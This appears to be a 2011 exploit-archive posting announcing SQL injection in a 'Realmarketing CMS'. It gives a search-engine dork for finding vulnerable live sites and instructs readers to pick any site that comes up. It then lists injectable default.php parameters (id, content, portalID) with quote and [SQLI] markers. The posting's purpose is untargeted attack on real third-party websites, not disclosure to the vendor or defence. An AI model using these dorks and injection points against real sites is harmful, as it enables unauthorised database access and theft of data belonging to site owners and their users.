#(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability
#(+)Author : ^Xecuti0n3r
#(+) Date : 22.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) dork : intext:realweb.de inurl:default.php
#(+) Category : Web Apps [SQli]
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php" in search engine
*SQL injection Vulnerability*
# [+]http://site.com/default.php?id='125
# [+]http://site.com/default.php?id=[SQLI]
# [+]http://site.com/default.php?content='2485
# [+]http://site.com/default.php?content=[SQLI]
# [+]http://site.com/default.php?portalID='68
# [+]http://site.com/default.php?portalID=[SQLI]
# [+]http://site.com/default.php?&id='121
# [+]http://site.com/default.php?&id=[SQLI]
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################